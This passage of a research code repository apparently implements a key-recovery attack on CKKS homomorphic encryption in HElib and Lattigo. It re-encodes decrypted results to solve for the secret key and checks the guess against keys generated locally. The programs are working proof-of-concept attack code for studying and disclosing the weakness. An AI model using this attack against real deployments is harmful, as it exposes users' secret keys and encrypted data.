} 108 | helib::PubKey publicKey(secretKey); 109 | helib::EncryptedArrayCx const& ea(context.ea->getCx()); 110 | long n = ea.size(); // # slots 111 | 112 | ea.getPAlgebra().printout(); 113 | std::cout << "r = " << context.alMod.getR() << std::endl; 114 | std::cout << "ctxtPrimes=" << context.ctxtPrimes 115 | << ", ciphertext modulus bits=" << context.bitSizeOfQ() << std::endl 116 | << std::endl; 117 | 118 | #ifdef HELIB_DEBUG 119 | helib::setupDebugGlobals(&secretKey, context.ea); 120 | #endif 121 | 122 | // Initialize the plaintext vector 123 | std::vector> v1, v2; // v1 holds the plaintext input, v2 holds the decryption result 124 | ea.random(v1,B); // generate a random array of size m/2 125 | std::cout << "v : size = " << v1.size() << ", infty norm = " << largestCxNorm(v1) << std::endl; 126 | 127 | // Encryption 128 | helib::Ctxt c_v(publicKey); // Ctxt::parts contains the ciphertext polynomials 129 | ea.encrypt(c_v, publicKey, v1); 130 | 131 | // Homomorphic computation 132 | std::vector coeff(11); 133 | helib::Ctxt c_res(publicKey); 134 | switch (hc) { 135 | case HC_VARIANCE : 136 | c_res = evalVariance(ea, c_v, v1.size()); 137 | break; 138 | case HC_SIGMOID : 139 | coeff = SpecialFunction::coeffsOf[SpecialFunction::FuncName::SIGMOID]; 140 | c_res = evalFunction(c_v, n, coeff, evalDeg); // compute the logistic function 141 | break; 142 | case HC_EXP : 143 | coeff = SpecialFunction::coeffsOf[SpecialFunction::FuncName::EXP]; 144 | c_res = evalFunction(c_v, n, coeff, evalDeg); // compute the exponential function 145 | break; 146 | default : 147 | c_res = c_v; // just copy the input ciphertext 148 | } 149 | showCtxtScale(c_res, "result "); 150 | long logExtraScaling = std::ceil(log2(ea.encodeRoundingError() / 3.5)); 151 | helib::IndexSet s1 = c_res.getPrimeSet(); 152 | while(NTL::log(c_res.getRatFactor())/log(2.0) > r + logExtraScaling + 10 && s1.card() > 1) { 153 | s1.remove(s1.last()); 154 | c_res.modDownToSet(s1); 155 | showCtxtScale(c_res, "modDown"); 156 | s1 
= c_res.getPrimeSet(); 157 | } 158 | 159 | // Decryption 160 | ea.decrypt(c_res, secretKey, v2); 161 | 162 | // Check homomorphic computation error 163 | std::vector> ptRes(v2.size()); 164 | switch (hc) { 165 | case HC_VARIANCE : 166 | evalPlainVariance(ptRes, v1); 167 | break; 168 | case HC_SIGMOID : 169 | evalPlainFunc(ptRes, v1, SpecialFunction::SIGMOID, evalDeg); 170 | break; 171 | case HC_EXP : 172 | evalPlainFunc(ptRes, v1, SpecialFunction::EXP, evalDeg); 173 | break; 174 | default : 175 | ptRes = v1; 176 | } 177 | std::cout << "computation error = " << maxDiff(ptRes, v2) // abs(ptRes[0] - v2[v2.size()-1]) 178 | << ", relative error = " << relError(v2, ptRes) << std::endl; // maxDiff(ptRes, v2)/largestElm(ptRes) 179 | 180 | // Key recovery attack ************************************************** // 181 | 182 | // Now let's try to recover sk 183 | NTL::xdouble scalingFactor = c_res.getRatFactor(); 184 | 185 | // Here we use a modified encoding function to round directly into ZZX, 186 | // instead of rounding to a helib::zzX, which is a vector of long so it could 187 | // cause integer overflow 188 | NTL::ZZX mPrimeX; 189 | helib::CKKS_embedInSlots(mPrimeX, v2, context.zMStar, NTL::to_double(scalingFactor)); 190 | 191 | // Check if encoding recovers the decrypted ptxt (before modulo reduction) 192 | NTL::ZZX encodingDiffX = mPrimeX - helib::decrypted_ptxt_; 193 | NTL::xdouble mPrimeNorm = helib::coeffsL2Norm(mPrimeX); 194 | std::cout << "encoding error = " << helib::largestCoeff(encodingDiffX) << std::endl; 195 | std::cout << "m' norm = " << mPrimeNorm << ", bits = " << NTL::log(mPrimeNorm)/std::log(2) << std::endl; 196 | 197 | helib::DoubleCRT ctxtb = c_res.getPart(0); // Ctxt::getPart() is added to helib to access 198 | helib::DoubleCRT ctxta = c_res.getPart(1); // the individual parts 199 | 200 | NTL::ZZX ctxtbX, ctxtaX; 201 | ctxtb.toPoly(ctxtbX,true); 202 | ctxta.toPoly(ctxtaX,true); 203 | 204 | NTL::ZZ Q; 205 | context.productOfPrimes(Q, 
c_res.getPrimeSet()); 206 | std::cout << "sk.Q = " << Q << std::endl; 207 | 208 | NTL::ZZ_p::init(Q); 209 | 210 | NTL::ZZ_pX ctxtb_pX, ctxta_pX, mPrime_pX, phim_pX; 211 | NTL::conv(ctxtb_pX, ctxtbX); 212 | NTL::conv(ctxta_pX, ctxtaX); 213 | NTL::conv(mPrime_pX, mPrimeX); 214 | NTL::conv(phim_pX, context.zMStar.getPhimX()); 215 | 216 | NTL::ZZ_pX ss_pX, ctxtaInv_pX; 217 | NTL::ZZ_pX c_pX = mPrime_pX - ctxtb_pX; // c = m' - cb = ca * s 218 | NTL::InvMod(ctxtaInv_pX, ctxta_pX, phim_pX); // ca^{-1} mod (X^{m/2} + 1) 219 | NTL::MulMod(ss_pX, c_pX, ctxtaInv_pX, phim_pX); // c * ca^{-1} = s 220 | 221 | helib::DoubleCRT sk = secretKey.sKeys[0]; 222 | NTL::ZZX skX; 223 | sk.toPoly(skX,true); 224 | NTL::ZZ_pX sk_pX; 225 | NTL::conv(sk_pX, skX); 226 | 227 | bool foundKey = (ss_pX == sk_pX); 228 | std::cout << (foundKey ? "Found key!" : "Attack failed") << std::endl; 229 | } 230 | 231 | 232 | int main(int argc, char * argv[]) { 233 | HomomorphicComputation hc = argc>1 ? parseHC(argv[1]) : HC_NOOP; // Default noop 234 | long logQ = 300; 235 | long logm = argc>2 ? atoi(argv[2])+1 : 17; // m = 2N 236 | long logp = argc>3 ? atoi(argv[3]) : 20; // 20 bit precision 237 | double plainBound = argc>4 ? atof(argv[4]) : 1.0; // plaintext size 238 | long evalDeg = argc>5 ? 
atoi(argv[5]) : -1; // default to all degrees 239 | 240 | std::cout << "Running helib attack for " << hcString(hc) 241 | << ", N = 2^" << logm-1 242 | << ", logp = " << logp 243 | << ", |plaintext| = " << plainBound 244 | << ", evalDeg = " << evalDeg << std::endl; 245 | 246 | NTL::SetNumThreads(8); 247 | test(/*logm=*/logm, 248 | /*logp=*/logp, 249 | /*logQ=*/logQ, 250 | /*B=*/plainBound, 251 | /*evalDeg=*/evalDeg, 252 | /*hc=*/hc); 253 | return 0; 254 | } 255 | -------------------------------------------------------------------------------- /src/helib_utils.cpp: -------------------------------------------------------------------------------- 1 | #include "helib_utils.h" 2 | 3 | #include 4 | 5 | double largestCxNorm(std::vector> const& vec) { 6 | double m = 0; 7 | for (auto& x : vec) { 8 | if (m < std::abs(x)) 9 | m = std::abs(x); 10 | } 11 | return m; 12 | } 13 | 14 | 15 | void showDCRT(helib::DoubleCRT * dcrt, long size) { 16 | helib::Context const& context = dcrt->getContext(); 17 | helib::IndexMap const& map = dcrt->getMap(); 18 | helib::IndexSet const& s = map.getIndexSet(); 19 | NTL::ZZ Q; 20 | context.productOfPrimes(Q, s); 21 | std::cout << "[[" << Q << "]]" << std::endl; 22 | 23 | for (long i : s) { 24 | NTL::vec_long const& row = map[i]; 25 | NTL::zz_pX tmp; 26 | context.ithModulus(i).iFFT(tmp, row); // inverse FFT 27 | long phim = row.length(); 28 | long pi = context.ithPrime(i); // the i'th modulus 29 | std::cout << "[" << pi << "] "; 30 | for (size_t j = 0; j < phim && j < size; j++) { 31 | std::cout << tmp.rep[j] << ", "; 32 | } 33 | std::cout << std::endl; 34 | } 35 | } 36 | 37 | void showVec(helib::zzX * vals, long size) { 38 | std::cout << "["; 39 | std::cout << (*vals)[0]; 40 | for (long i = 1; i < size; ++i) { 41 | std::cout << ", " << (*vals)[i]; 42 | } 43 | std::cout << "]" << std::endl; 44 | } 45 | 46 | void showCtxtScale(helib::Ctxt const& c, char const* str) { 47 | std::cout << str << " rf = 2^" << 
NTL::log(NTL::fabs(c.getRatFactor()))/log(2.0) 48 | << ", pm = " << c.getPtxtMag() 49 | << ", log |q_l| = " << c.logOfPrimeSet()/log(2.0) << std::endl; 50 | } 51 | 52 | void add(std::vector<cx_double> & out, std::vector<cx_double> const& in0, std::vector<cx_double> const& in1) { 53 | for (size_t i = 0; i < in0.size(); i++) { 54 | out[i].real(in0[i].real() + in1[i].real()); 55 | out[i].imag(in0[i].imag() + in1[i].imag()); 56 | } 57 | } 58 | 59 | void mul(std::vector<cx_double> & out, std::vector<cx_double> const& in0, std::vector<cx_double> const& in1) { 60 | for (size_t i = 0; i < in0.size(); i++) { 61 | // Complex slot-wise product, as computed by homomorphic multiplication 62 | out[i] = in0[i] * in1[i]; 63 | } 64 | } 65 | 66 | std::vector<cx_double> diff(std::vector<cx_double> const& in0, std::vector<cx_double> const& in1) { 67 | std::vector<cx_double> out(in0.size()); 68 | for (size_t i = 0; i < std::min(in0.size(), in1.size()); i++) { 69 | out[i].real(in0[i].real() - in1[i].real()); 70 | out[i].imag(in0[i].imag() - in1[i].imag()); 71 | } 72 | return out; 73 | } 74 | 75 | NTL::ZZX decrypted; 76 | 77 | void copyTo(NTL::ZZX * tgt, NTL::ZZX const* src) { 78 | *tgt = *src; 79 | } 80 | 81 | 82 | -------------------------------------------------------------------------------- /src/helib_utils.h: -------------------------------------------------------------------------------- 1 | #ifndef HELIB_UTILS_H 2 | #define HELIB_UTILS_H 3 | /* Some helper functions for using helib */ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #include "ntl_utils.h" 10 | 11 | double largestCxNorm(std::vector<std::complex<double>> const& vec); 12 | 13 | void showDCRT(helib::DoubleCRT * dcrt, long size); 14 | 15 | void showVec(helib::zzX * vals, long size); 16 | 17 | void showCtxtScale(helib::Ctxt const& c, char const* str); 18 | 19 | typedef std::complex<double> cx_double; 20 | 21 | void mul(std::vector<cx_double> & out, std::vector<cx_double> const& in0, std::vector<cx_double> const& in1); 22 | 23 | void add(std::vector<cx_double> & out, std::vector<cx_double> const& in0, std::vector<cx_double> const& in1); 24 | 25 | std::vector<cx_double> diff(std::vector<cx_double> const& in0, std::vector<cx_double> const& in1); 26 | 27 | extern
NTL::ZZX decrypted; 28 | void copyTo(NTL::ZZX * tgt, NTL::ZZX const* src); 29 | 30 | #include 31 | #include 32 | 33 | template 34 | std::ostream &operator <<(std::ostream &os, const std::vector &v) { 35 | using namespace std; 36 | os << "["; 37 | copy(v.begin(), v.end(), ostream_iterator(os, " ")); 38 | os << "]"; 39 | return os; 40 | } 41 | 42 | 43 | #endif // HELIB_UTILS_H 44 | 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /src/lattigo/go.mod: -------------------------------------------------------------------------------- 1 | module ckks_attack 2 | 3 | go 1.13 4 | 5 | replace github.com/ldsec/lattigo/v2 => /scratch/lattigo // change "/scratch/lattigo" to your lattigo path 6 | 7 | require github.com/ldsec/lattigo/v2 v2.0.0-00010101000000-000000000000 8 | -------------------------------------------------------------------------------- /src/lattigo/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "math" 6 | "math/cmplx" 7 | "math/rand" 8 | "math/big" 9 | "time" 10 | "unsafe" 11 | "github.com/ldsec/lattigo/v2/ring" 12 | "github.com/ldsec/lattigo/v2/ckks" 13 | ) 14 | 15 | func randomFloat(min, max float64) float64 { 16 | return min + rand.Float64()*(max-min) 17 | } 18 | 19 | func randomComplex(min, max float64) complex128 { 20 | return complex(randomFloat(min, max), randomFloat(min, max)) 21 | } 22 | 23 | //////////////////////////////////////////////////////////////////////////////// 24 | // The linear key recovery attack, applied to homomorphically computed sigmoid 25 | // of random complex numbers in [-8, 8], in the full packing mode 26 | //////////////////////////////////////////////////////////////////////////////// 27 | func attack_sigmoid() { 28 | 29 | // This demo is modified on top of the example code lattigo/sigmoid. 
30 | // The following computation packs random 8192 float64 values in the range [-8, 8] 31 | // and approximates the function 1/(exp(-x) + 1) over the range [-8, 8]. 32 | // Once the homomorphic computation is done, we decrypt and decode the results, 33 | // and then re-encode the resulting noisy complex numbers into a polynomial m', 34 | // and then try to compute the linear equation s' = c[a]^{-1} * (m' - c[b]) 35 | 36 | rand.Seed(time.Now().UnixNano()) 37 | 38 | // Scheme params 39 | params := ckks.DefaultParams[ckks.PN15QP827pq] 40 | 41 | encoder := ckks.NewEncoder(params) 42 | 43 | // Keys 44 | kgen := ckks.NewKeyGenerator(params) 45 | var sk *ckks.SecretKey 46 | var pk *ckks.PublicKey 47 | sk, pk = kgen.GenKeyPair() 48 | 49 | // Relinearization key 50 | var rlk *ckks.EvaluationKey 51 | rlk = kgen.GenRelinKey(sk) 52 | 53 | // Encryptor 54 | encryptor := ckks.NewEncryptorFromPk(params, pk) 55 | 56 | // Decryptor 57 | decryptor := ckks.NewDecryptor(params, sk) 58 | 59 | // Evaluator 60 | evaluator := ckks.NewEvaluator(params) 61 | 62 | // Values to encrypt 63 | values := make([]complex128, params.Slots()) 64 | for i := range values { 65 | values[i] = complex(randomFloat(-8, 8), 0) 66 | } 67 | 68 | fmt.Printf("CKKS parameters: logN = %d, logQ = %d, levels = %d, scale= %f, sigma = %f \n", 69 | params.LogN(), params.LogQP(), params.MaxLevel()+1, params.Scale(), params.Sigma()) 70 | fmt.Println() 71 | fmt.Printf("Values : %6f %6f %6f %6f...\n", 72 | round(values[0]), round(values[1]), round(values[2]), round(values[3])) 73 | fmt.Println() 74 | 75 | // Plaintext creation and encoding process 76 | plaintext := ckks.NewPlaintext(params, params.MaxLevel(), params.Scale()) 77 | encoder.Encode(plaintext, values, params.Slots()) 78 | 79 | // Encryption process 80 | var ciphertext *ckks.Ciphertext 81 | ciphertext = encryptor.EncryptNew(plaintext) 82 | 83 | fmt.Println("Evaluation of the function 1/(exp(-x)+1) in the range [-8, 8] (degree of approximation: 32)") 84 | 85 | // 
Evaluation process 86 | // We approximate f(x) in the range [-8, 8] with a Chebyshev interpolant of 33 coefficients (degree 32). 87 | chebyapproximation := ckks.Approximate(f, -8, 8, 33) 88 | 89 | // We evaluate the Chebyshev interpolant on the ciphertext 90 | ciphertext = evaluator.EvaluateCheby(ciphertext, chebyapproximation, rlk) 91 | 92 | fmt.Println("Done... Consumed levels:", params.MaxLevel()-ciphertext.Level()) 93 | 94 | // Computation of the reference values 95 | for i := range values { 96 | values[i] = f(values[i]) 97 | } 98 | 99 | // Print results and comparison 100 | printDebug(params, ciphertext, values, decryptor, encoder) 101 | 102 | // Decrypt ciphertext 103 | level := ciphertext.Level() 104 | plaintextNoisy := decryptor.DecryptNew(ciphertext) 105 | valuesNoisy := make([]complex128, params.Slots()) 106 | valuesNoisy = encoder.Decode(plaintextNoisy, params.Slots()) 107 | if plaintextNoisy.Level() != level { panic("level doesn't match") } 108 | if !plaintextNoisy.IsNTT() { panic("decrypted plaintext should be in NTT form") } 109 | fmt.Printf("level = %d, scale = %f, slots = %d\n", level, math.Log2(plaintextNoisy.Scale()), params.Slots()) 110 | fmt.Println("Now try to recover the secret key...") 111 | 112 | // Re-encode 113 | plaintextTest := ckks.NewPlaintext(params, level, plaintextNoisy.Scale()) 114 | encoder.Encode(plaintextTest, valuesNoisy, params.Slots()) // plaintextTest is not in NTT 115 | if plaintextTest.IsNTT() { 116 | panic("encoded plaintext should not be in NTT form") 117 | } 118 | 119 | // Create a ring data structure 120 | var ringQ *ring.Ring 121 | ringQ, _ = ring.NewRing(params.N(), params.Qi()) 122 | 123 | // mEncode is the re-encoded polynomial, in NTT form 124 | mEncode := ringQ.NewPolyLvl(level) 125 | ringQ.NTTLvl(level, plaintextTest.Value()[0], mEncode) // mEncode in NTT 126 | 127 | mNoisy := ringQ.NewPolyLvl(level) // plaintextNoisy in non-NTT form 128 | mError := ringQ.NewPolyLvl(level) // encoding error 129 |
ringQ.InvNTTLvl(level, plaintextNoisy.Value()[0], mNoisy) // mNoisy is not in NTT 130 | ringQ.SubLvl(level, plaintextTest.Value()[0], mNoisy, mError) 131 | nm := inftyNorm(ringQ, mError, params.N()) 132 | fmt.Printf("encoding error = %s\n", nm.String()); 133 | 134 | // Compute the linear equation m' - c[b] = c[a] * s 135 | if !ciphertext.IsNTT() { panic("ciphertext should be in NTT form") } 136 | rhs := ringQ.NewPolyLvl(level) 137 | ringQ.SubLvl(level, mEncode, ciphertext.Value()[0], rhs) // rhs is in NTT 138 | 139 | aInv := ringQ.NewPolyLvl(level) 140 | InvPolyNTT(ringQ, level, ciphertext.Value()[1], aInv) // aInv is in NTT 141 | 142 | sGuess := ringQ.NewPolyLvl(level) 143 | ringQ.MulCoeffsMontgomeryLvl(level, rhs, aInv, sGuess) // sGuess is in NTT 144 | // ringQ.InvNTTLvl(level, sGuess, sGuess) 145 | 146 | s := sk.Get().CopyNew() 147 | ringQ.InvMForm(s, s) 148 | // ringQ.InvNTT(s, s) 149 | if ringQ.EqualLvl(level, sGuess, s) { 150 | fmt.Printf("Found key!\n") 151 | } else { 152 | fmt.Printf("Failed\n") 153 | } 154 | } 155 | 156 | ////////////////////////////////////////////////// 157 | // Inversion in the cyclotomic ring 158 | ////////////////////////////////////////////////// 159 | 160 | // modular exponential, taken from lattigo/utils/utils.go 161 | func modExp(x, e, p uint64, bredParams []uint64) (result uint64) { 162 | result = 1 163 | for i := e; i > 0; i >>= 1 { 164 | if i&1 == 1 { 165 | result = ring.BRed(result, x, p, bredParams) 166 | } 167 | x = ring.BRed(x, x, p, bredParams) 168 | } 169 | return result 170 | } 171 | 172 | // compute p1^{-1} in the ring r, and return the result in p2 173 | func InvPolyNTT(r *ring.Ring, level uint64, p1, p2 *ring.Poly) { 174 | for i := uint64(0); i < level+1; i++ { 175 | qi := r.Modulus[i] 176 | p1tmp, p2tmp := p1.Coeffs[i], p2.Coeffs[i] 177 | bredParams := r.BredParams[i] 178 | for j := uint64(0); j < r.N; j = j + 8 { 179 | x := (*[8]uint64)(unsafe.Pointer(&p1tmp[j])) 180 | y := (*[8]uint64)(unsafe.Pointer(&p2tmp[j])) 
181 | 182 | y[0] = ring.MForm(modExp(x[0], qi-2, qi, bredParams), qi, bredParams) 183 | y[1] = ring.MForm(modExp(x[1], qi-2, qi, bredParams), qi, bredParams) 184 | y[2] = ring.MForm(modExp(x[2], qi-2, qi, bredParams), qi, bredParams) 185 | y[3] = ring.MForm(modExp(x[3], qi-2, qi, bredParams), qi, bredParams) 186 | y[4] = ring.MForm(modExp(x[4], qi-2, qi, bredParams), qi, bredParams) 187 | y[5] = ring.MForm(modExp(x[5], qi-2, qi, bredParams), qi, bredParams) 188 | y[6] = ring.MForm(modExp(x[6], qi-2, qi, bredParams), qi, bredParams) 189 | y[7] = ring.MForm(modExp(x[7], qi-2, qi, bredParams), qi, bredParams) 190 | } 191 | } 192 | } 193 | 194 | 195 | func inftyNorm(r *ring.Ring, p *ring.Poly, N uint64) *big.Int { 196 | max := new(big.Int) 197 | 198 | level := uint64(len(p.Coeffs)-1) 199 | 200 | bigintCoeffs := make([]*big.Int, N) 201 | r.PolyToBigint(p, bigintCoeffs) 202 | 203 | QBigInt := ring.NewUint(1) 204 | for i := range r.Modulus[:level+1]{ 205 | QBigInt.Mul(QBigInt, ring.NewUint(r.Modulus[i])) 206 | } 207 | 208 | QHalfBigInt := new(big.Int) 209 | QHalfBigInt.Set(QBigInt) 210 | QHalfBigInt.Rsh(QBigInt, 1) 211 | 212 | // Centers and absolute values 213 | var sign int 214 | for i := range bigintCoeffs{ 215 | sign = bigintCoeffs[i].Cmp(QHalfBigInt) 216 | if sign == 1 || sign == 0 { 217 | bigintCoeffs[i].Sub(bigintCoeffs[i], QBigInt) 218 | bigintCoeffs[i].Abs(bigintCoeffs[i]) 219 | } 220 | } 221 | 222 | for i := uint64(0); i < r.N; i++ { 223 | if bigintCoeffs[i].Cmp(max) > 0 { 224 | max = bigintCoeffs[i] 225 | } 226 | } 227 | return max 228 | } 229 | 230 | func printPoly(r *ring.Ring, p *ring.Poly, level uint64) { 231 | for i := uint64(0); i < level+1; i++ { 232 | qi := r.Modulus[i] 233 | fmt.Printf("[%d] = %d %d %d %d...\n", qi, p.Coeffs[i][0], p.Coeffs[i][1], p.Coeffs[i][2], p.Coeffs[i][3]) 234 | } 235 | } 236 | 237 | func printComplex(values []complex128) { 238 | fmt.Printf("%6.10f %6.10f %6.10f %6.10f %6.10f %6.10f %6.10f %6.10f...\n", 239 | values[0], 
values[1], values[2], values[3], values[4], values[5], values[6], values[7]) 240 | } 241 | 242 | func f(x complex128) complex128 { 243 | return 1 / (cmplx.Exp(-x) + 1) 244 | } 245 | 246 | func round(x complex128) complex128 { 247 | var factor float64 248 | factor = 100000000 249 | a := math.Round(real(x)*factor) / factor 250 | b := math.Round(imag(x)*factor) / factor 251 | return complex(a, b) 252 | } 253 | 254 | func printDebug(params *ckks.Parameters, ciphertext *ckks.Ciphertext, valuesWant []complex128, decryptor ckks.Decryptor, encoder ckks.Encoder) (valuesTest []complex128) { 255 | slots := uint64(len(valuesWant)) 256 | 257 | valuesTest = encoder.Decode(decryptor.DecryptNew(ciphertext), slots) 258 | 259 | fmt.Println() 260 | fmt.Printf("Level: %d (logQ = %d)\n", ciphertext.Level(), params.LogQLvl(ciphertext.Level())) 261 | fmt.Printf("Scale: 2^%f\n", math.Log2(ciphertext.Scale())) 262 | fmt.Printf("ValuesTest: %6.10f %6.10f %6.10f %6.10f...\n", valuesTest[0], valuesTest[1], valuesTest[2], valuesTest[3]) 263 | fmt.Printf("ValuesWant: %6.10f %6.10f %6.10f %6.10f...\n", valuesWant[0], valuesWant[1], valuesWant[2], valuesWant[3]) 264 | fmt.Println() 265 | 266 | precStats := ckks.GetPrecisionStats(params, nil, nil, valuesWant, valuesTest) 267 | fmt.Println(precStats.String()) 268 | 269 | return 270 | } 271 | 272 | func main() { 273 | attack_sigmoid() 274 | } 275 | -------------------------------------------------------------------------------- /src/lattigo_new/go.mod: -------------------------------------------------------------------------------- 1 | module ckks_attack 2 | 3 | go 1.13 4 | 5 | replace github.com/ldsec/lattigo/v2 => /scratch/lattigo // change "/scratch/lattigo" to your lattigo path 6 | 7 | require github.com/ldsec/lattigo/v2 v2.0.0-00010101000000-000000000000 8 | -------------------------------------------------------------------------------- /src/lattigo_new/main.go: -------------------------------------------------------------------------------- 1 
| package main 2 | 3 | import ( 4 | "fmt" 5 | "math" 6 | "math/cmplx" 7 | "math/rand" 8 | "math/big" 9 | "time" 10 | "unsafe" 11 | "github.com/ldsec/lattigo/v2/ring" 12 | "github.com/ldsec/lattigo/v2/ckks" 13 | ) 14 | 15 | func randomFloat(min, max float64) float64 { 16 | return min + rand.Float64()*(max-min) 17 | } 18 | 19 | func randomComplex(min, max float64) complex128 { 20 | return complex(randomFloat(min, max), randomFloat(min, max)) 21 | } 22 | 23 | //////////////////////////////////////////////////////////////////////////////// 24 | // The linear key recovery attack, applied to homomorphically computed sigmoid 25 | // of random complex numbers in [-8, 8], in the full packing mode 26 | //////////////////////////////////////////////////////////////////////////////// 27 | func attack_sigmoid() { 28 | 29 | var err error 30 | 31 | // This demo is modified on top of the example code lattigo/sigmoid. 32 | // The following computation packs random 8192 float64 values in the range [-8, 8] 33 | // and approximates the function 1/(exp(-x) + 1) over the range [-8, 8]. 
34 | // Once the homomorphic computation is done, we decrypt and decode the results, 35 | // and then re-encode the resulting noisy complex numbers into a polynomial m', 36 | // and then try to compute the linear equation s' = c[a]^{-1} * (m' - c[b]) 37 | 38 | rand.Seed(time.Now().UnixNano()) 39 | 40 | // Scheme params 41 | params := ckks.DefaultParams[ckks.PN15QP827pq] 42 | 43 | encoder := ckks.NewEncoder(params) 44 | 45 | // Keys 46 | kgen := ckks.NewKeyGenerator(params) 47 | var sk *ckks.SecretKey 48 | var pk *ckks.PublicKey 49 | sk, pk = kgen.GenKeyPair() 50 | 51 | // Relinearization key 52 | var rlk *ckks.EvaluationKey 53 | rlk = kgen.GenRelinKey(sk) 54 | 55 | // Encryptor 56 | encryptor := ckks.NewEncryptorFromPk(params, pk) 57 | 58 | // Decryptor 59 | decryptor := ckks.NewDecryptor(params, sk) 60 | 61 | // Evaluator 62 | evaluator := ckks.NewEvaluator(params) 63 | 64 | // Values to encrypt 65 | values := make([]complex128, params.Slots()) 66 | for i := range values { 67 | values[i] = complex(randomFloat(-8, 8), 0) 68 | } 69 | 70 | fmt.Printf("CKKS parameters: logN = %d, logQ = %d, levels = %d, scale= %f, sigma = %f \n", 71 | params.LogN(), params.LogQP(), params.MaxLevel()+1, params.Scale(), params.Sigma()) 72 | fmt.Println() 73 | fmt.Printf("Values : %6f %6f %6f %6f...\n", 74 | round(values[0]), round(values[1]), round(values[2]), round(values[3])) 75 | fmt.Println() 76 | 77 | // Plaintext creation and encoding process 78 | plaintext := encoder.EncodeNew(values, params.LogSlots()) 79 | 80 | 81 | // Encryption process 82 | var ciphertext *ckks.Ciphertext 83 | ciphertext = encryptor.EncryptNew(plaintext) 84 | 85 | fmt.Println("Evaluation of the function 1/(exp(-x)+1) in the range [-8, 8] (degree of approximation: 32)") 86 | 87 | // Evaluation process 88 | // We approximate f(x) in the range [-8, 8] with a Chebyshev interpolant of 33 coefficients (degree 32). 
89 | chebyapproximation := ckks.Approximate(f, -8, 8, 33) 90 | a := chebyapproximation.A() 91 | b := chebyapproximation.B() 92 | 93 | // Change of variable 94 | evaluator.MultByConst(ciphertext, 2/(b-a), ciphertext) 95 | evaluator.AddConst(ciphertext, (-a-b)/(b-a), ciphertext) 96 | evaluator.Rescale(ciphertext, params.Scale(), ciphertext) 97 | // We evaluate the Chebyshev interpolant on the ciphertext 98 | if ciphertext, err = evaluator.EvaluateCheby(ciphertext, chebyapproximation, rlk); err != nil { 99 | panic(err) 100 | } 101 | fmt.Println("Done... Consumed levels:", params.MaxLevel()-ciphertext.Level()) 102 | 103 | // Computation of the reference values 104 | for i := range values { 105 | values[i] = f(values[i]) 106 | } 107 | 108 | // Print results and comparison 109 | printDebug(params, ciphertext, values, decryptor, encoder) 110 | 111 | // Decrypt ciphertext 112 | level := ciphertext.Level() 113 | plaintextNoisy := decryptor.DecryptNew(ciphertext) 114 | 115 | valuesExact := make([]complex128, params.Slots()) 116 | valuesExact = encoder.DecodeAndRound(plaintextNoisy, params.LogSlots(), plaintextNoisy.Scale()) // 1<<35 117 | 118 | valuesNoisy := make([]complex128, params.Slots()) 119 | valuesNoisy = encoder.DecodeAndRound(plaintextNoisy, params.LogSlots(), 1<<35) 120 | if plaintextNoisy.Level() != level { panic("level doesn't match") } 121 | if !plaintextNoisy.IsNTT() { panic("decrypted plaintext should be in NTT form") } 122 | fmt.Printf("level = %d, scale = %f, slots = %d\n", level, math.Log2(plaintextNoisy.Scale()), params.Slots()) 123 | fmt.Printf("added noise = %f\n", maxDiff(valuesExact, valuesNoisy)) 124 | 125 | fmt.Println("Now try to recover the secret key...") 126 | 127 | sc := 1<<5 128 | ciphertextScaled := evaluator.MultByConstNew(ciphertext, sc) 129 | fmt.Printf("Scale up...level = %d, scale = %f\n", ciphertextScaled.Level(), math.Log2(ciphertextScaled.Scale())) 130 | 131 | plaintextScaled := decryptor.DecryptNew(ciphertextScaled)
132 | valuesScaled := make([]complex128, params.Slots()) 133 | valuesScaled = encoder.DecodeAndRound(plaintextScaled, params.LogSlots(), plaintextScaled.Scale()/(1<<5)) 134 | fmt.Printf("valuesScaled = %f + %f I\n", real(valuesScaled[0]), imag(valuesScaled[0])) 135 | fmt.Printf("plaintextScaled level = %d, scale = %f\n", plaintextScaled.Level(), math.Log2(plaintextScaled.Scale())) 136 | 137 | { 138 | scInv := 1.0/float64(sc) 139 | for i := range valuesNoisy { 140 | // B := float64(1<<35) 141 | re := real(valuesScaled[i])*scInv 142 | im := imag(valuesScaled[i])*scInv 143 | valuesNoisy[i] = complex(re, im) 144 | } 145 | // evaluator.MultByConst(ciphertext, scInv, ciphertext) 146 | fmt.Println("Scale down... at levels:", ciphertext.Level(), ", scale = ", math.Log2(ciphertext.Scale())) 147 | // evaluator.Rescale(ciphertext, params.Scale(), ciphertext) 148 | // fmt.Println("Rescale... at levels:", ciphertext.Level(), ", scale = ", math.Log2(ciphertext.Scale())) 149 | // level = ciphertext.Level() 150 | // plaintextNoisy = decryptor.DecryptNew(ciphertext) 151 | } 152 | 153 | // Re-encode 154 | plaintextTest := ckks.NewPlaintext(params, level, ciphertext.Scale()) 155 | encoder.Encode(plaintextTest, valuesNoisy, params.LogSlots()) // plaintextTest is not in NTT 156 | if plaintextTest.IsNTT() { 157 | panic("encoded plaintext should not be in NTT form") 158 | } 159 | 160 | // Create a ring data structure 161 | var ringQ *ring.Ring 162 | ringQ, _ = ring.NewRing(params.N(), params.Qi()) 163 | 164 | // mEncode is the re-encoded polynomial, in NTT form 165 | mEncode := ringQ.NewPolyLvl(level) 166 | ringQ.NTTLvl(level, plaintextTest.Value()[0], mEncode) // mEncode in NTT 167 | 168 | 169 | 170 | mNoisy := ringQ.NewPolyLvl(level) // plaintextNoisy in non-NTT form 171 | mError := ringQ.NewPolyLvl(level) // encoding error 172 | ringQ.InvNTTLvl(level, plaintextNoisy.Value()[0], mNoisy) // mNoisy is not in NTT 173 | ringQ.SubLvl(level, plaintextTest.Value()[0], mNoisy, mError) 174 | nm
